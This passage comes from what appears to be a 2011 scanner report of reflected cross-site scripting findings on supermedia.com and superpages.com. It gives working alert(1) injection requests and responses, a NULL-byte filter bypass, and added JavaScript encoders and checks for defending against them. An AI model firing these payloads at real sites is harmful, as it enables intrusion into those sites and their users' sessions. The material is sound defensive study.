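function jsStringEscape(value) {
  return JSON.stringify(String(value))
    .slice(1, -1)
    .replace(/'/g, "\\u0027")
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHardened(quote, param) {
  return `var dest = ${quote}https://www.example.test/?cid=${jsStringEscape(param)}${quote};`;
}

// Structural check modelled on what the scanner infers: walk the literal that
// opens at `start`, honouring backslash escapes, and return the index of the
// quote that closes it.
function closingQuoteIndex(src, start) {
  const quote = src[start];
  for (let i = start + 1; i < src.length; i++) {
    if (src[i] === "\\") { i += 1; continue; }
    if (src[i] === quote) return i;
  }
  return -1;
}

// The value stayed inside the literal only if the closing quote is followed
// directly by the statement's ';'.
function payloadStaysInString(statement) {
  const start = statement.indexOf("= ") + 2;
  const end = closingQuoteIndex(statement, start);
  return end !== -1 && statement.slice(end + 1) === ";";
}

// Execute the rendered statement with a stubbed alert() and report whether
// injected code actually ran.
function alertFires(statement) {
  let fired = false;
  new Function("alert", statement)(() => { fired = true; });
  return fired;
}

// Payloads taken from findings 1.500 and 1.503 above.
const SINGLE_QUOTE_PAYLOAD = "inav_homea4b2f'-alert(1)-'731207dc1c";
const DOUBLE_QUOTE_PAYLOAD = 'SP_FT_AddEditaBusinessaac2e";alert(1)//8d034beed23';

if (typeof require !== "undefined" && require.main === module) {
  for (const [quote, payload] of [["'", SINGLE_QUOTE_PAYLOAD], ['"', DOUBLE_QUOTE_PAYLOAD]]) {
    const bad = renderVulnerable(quote, payload);
    const good = renderHardened(quote, payload);
    console.log(`${quote} vulnerable: breaks out=${!payloadStaysInString(bad)} alert=${alertFires(bad)}`);
    console.log(`${quote} hardened:   breaks out=${!payloadStaysInString(good)} alert=${alertFires(good)}`);
  }
}
```

The escape is applied at the point where the value enters the script block, which is the only place that knows the output context; URL-encoding the value earlier (as the %253d and %3d in the openforum responses show) does not help, because the quote characters are left alone. Where the data is only needed by client-side code, putting it in a data- attribute or a JSON blob in a non-executing script type and reading it from there removes the script context altogether.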

1.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The scanner records the parameter name as &tsrc because the query string opens with an empty parameter (?&tsrc=...); the reflection point, s.eVar2, is the same one reported in 1.504. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response. The response also copies the submitted value into the trafficSource cookie (see the Set-Cookie header below); because the value contains a semicolon, the cookie stored by the client is truncated to "SP198c8\", as the Cookie header of the later supermedia.com requests in this report shows.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:34 GMT
Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/
Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top";
s.products="";
s.eVar1="";
s.eVar2="SP198c8";alert(1)//96cb9badcf2";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

1.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:45 GMT
Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/
Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
4="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Topb7d7a";alert(1)//5f4e0e8915";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top.647f4";alert(1)//acd0e29ec22";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...
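
The following is an added example, not code from the report, the scanned site or any WAF product, modelling the NULL byte bypass described in finding 1.507. A filter implemented over C-style strings stops reading at the first 0x00 byte, so everything after %00 is never inspected, while the application framework later drops the NUL (the response above renders it as a lone ".") and hands the rest of the value to the script context. The blocked-fragment list, the rendering step and the function names are assumptions for illustration; the two campaignId values are taken from the requests in findings 1.506 and 1.507.

```javascript
// Added example, not from the report or supermedia.com: a model of the NUL
// byte bypass in finding 1.507. `blockedByNaiveFilter` behaves like a filter
// written over C strings, where the first 0x00 byte ends the value;
// `blockedByLengthAwareFilter` inspects every byte. The rule set, the
// rendering step and the names are assumptions for illustration; the
// rendered line mirrors s.campaign="..." in the response above.

const BLOCKED_FRAGMENTS = ['"', "'", ";", "alert("];

// Percent-decode the raw query value into bytes; %00 becomes a real NUL byte.
function decodeQueryValue(raw) {
  return Buffer.from(decodeURIComponent(raw.replace(/\+/g, " ")), "utf8");
}

// Native-style filter: inspects only the bytes before the first NUL.
function blockedByNaiveFilter(bytes) {
  const nul = bytes.indexOf(0);
  const visible = (nul === -1 ? bytes : bytes.subarray(0, nul)).toString("utf8");
  return BLOCKED_FRAGMENTS.some((needle) => visible.includes(needle));
}

// Length-aware filter: inspects the whole value.
function blockedByLengthAwareFilter(bytes) {
  const whole = bytes.toString("utf8");
  return BLOCKED_FRAGMENTS.some((needle) => whole.includes(needle));
}

// Application model: the framework drops the NUL and the remainder lands in a
// double-quoted JS string, exactly the context reported for campaignId.
function renderCampaign(bytes) {
  const value = bytes.toString("utf8").replace(/\u0000/g, "");
  return `s.campaign="${value}";`;
}

// Returns the rendered line, or null when the filter rejects the request.
function handleCampaignId(rawQueryValue, filter) {
  const bytes = decodeQueryValue(rawQueryValue);
  return filter(bytes) ? null : renderCampaign(bytes);
}

// Values taken from the requests in findings 1.506 and 1.507 above.
const PLAIN_PAYLOAD = 'BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915';
const NUL_PAYLOAD = 'BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22';

if (typeof require !== "undefined" && require.main === module) {
  console.log("plain, naive filter:      ", handleCampaignId(PLAIN_PAYLOAD, blockedByNaiveFilter));
  console.log("with NUL, naive filter:   ", handleCampaignId(NUL_PAYLOAD, blockedByNaiveFilter));
  console.log("with NUL, length-aware:   ", handleCampaignId(NUL_PAYLOAD, blockedByLengthAwareFilter));
}
```

The point of the model is the mismatch: the filter and the application disagree about where the value ends. Fixing the output encoding in the application (as in the previous findings) removes the bug regardless of what the filter sees; the filter fix is only defence in depth.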

1.508. http://www.supermedia.com/online-advertising [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AdvertiseWithUs6f17b";alert(1)//351308f1023";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.509. http://www.supermedia.com/online-advertising [tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="";
s.products="";
s.eVar1="";
s.eVar2="SPb9e22";alert(1)//51aaefb74c6";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&ab2fa"><script>alert(1)</script>887ac555049=1" rel="stylesheet" />
...[SNIP]...

1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:20 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow">
...[SNIP]...
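
The following is an added example, not code from the report or from superpages.com, covering the two non-script contexts in findings 1.510 and 1.511: a double-quoted HTML attribute value and an HTML comment. The templates follow the response snippets above; the comment wrapper around the anchor, the host www.example.test and the function names are assumptions. Each context gets the encoder that fits it, and a small structural check tells whether a <script> start tag would reach the HTML parser as a tag rather than as attribute or comment text.

```javascript
// Added example, not from the report or superpages.com: the attribute and
// comment contexts of findings 1.510 and 1.511, with a context-appropriate
// encoder for each and a structural check. Templates follow the response
// snippets; the comment wrapper, www.example.test and the names are assumed.

// Attribute context: encode the five characters that can change HTML
// structure. '&' goes first so the others are not double-encoded.
function htmlAttrEncode(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Comment context: entities are not decoded inside <!-- -->, so encoding buys
// nothing for the browser; what matters is that the value can never form
// "-->" or "--!>". Removing '>' and collapsing "--" guarantees that.
function commentEncode(value) {
  return String(value).replace(/>/g, "&gt;").replace(/-{2,}/g, "-");
}

const identity = (v) => v;

function renderLink(param, encode = identity) {
  return `<link href="http://www.example.test/css/header.css?SRC=&${encode(param)}=1" rel="stylesheet" />`;
}

function renderComment(param, encode = identity) {
  return `<!-- nav: <a href="?SRC=&${encode(param)}=1#" rel="nofollow"> -->`;
}

// Structural check: does a <script start tag appear where the HTML parser
// would treat it as a tag, i.e. outside any attribute value and outside any
// comment? Tracks only tag, quote and comment state, which is enough here.
function scriptTagReachesParser(html) {
  let i = 0, inTag = false, quote = null, inComment = false;
  while (i < html.length) {
    if (inComment) {
      if (html.startsWith("-->", i)) { inComment = false; i += 3; } else { i += 1; }
      continue;
    }
    if (!inTag) {
      if (html.startsWith("<!--", i)) { inComment = true; i += 4; continue; }
      if (/^<script[\s>]/i.test(html.slice(i, i + 8))) return true;
      if (html[i] === "<") inTag = true;
      i += 1;
      continue;
    }
    if (quote) {
      if (html[i] === quote) quote = null;
    } else if (html[i] === '"' || html[i] === "'") {
      quote = html[i];
    } else if (html[i] === ">") {
      inTag = false;
    }
    i += 1;
  }
  return false;
}

// Payloads taken from findings 1.510 and 1.511 above.
const ATTR_PAYLOAD = 'ab2fa"><script>alert(1)</script>887ac555049';
const COMMENT_PAYLOAD = 'b3044--><script>alert(1)</script>9a336ccd25a';

if (typeof require !== "undefined" && require.main === module) {
  console.log("attribute, raw:     ", scriptTagReachesParser(renderLink(ATTR_PAYLOAD)));
  console.log("attribute, encoded: ", scriptTagReachesParser(renderLink(ATTR_PAYLOAD, htmlAttrEncode)));
  console.log("comment, raw:       ", scriptTagReachesParser(renderComment(COMMENT_PAYLOAD)));
  console.log("comment, encoded:   ", scriptTagReachesParser(renderComment(COMMENT_PAYLOAD, commentEncode)));
}
```

Two caveats a practitioner should keep in mind. First, the attribute here is an href, so even a correctly encoded value still needs a scheme check (javascript: URLs are a separate problem that entity encoding does not address). Second, a value inside an HTML comment is shipped in the page source to every client even when it cannot close the comment, so the remediation the report gives for 1.511 is the right one: do not echo request data into comments at all.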

1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:16 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow">
...[SNIP]...

1.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/Facebook

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57268
Date: Thu, 03 Feb 2011 17:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/
Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:29:25 GMT
Content-Length: 66686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
ype="two";
searchtype="two";
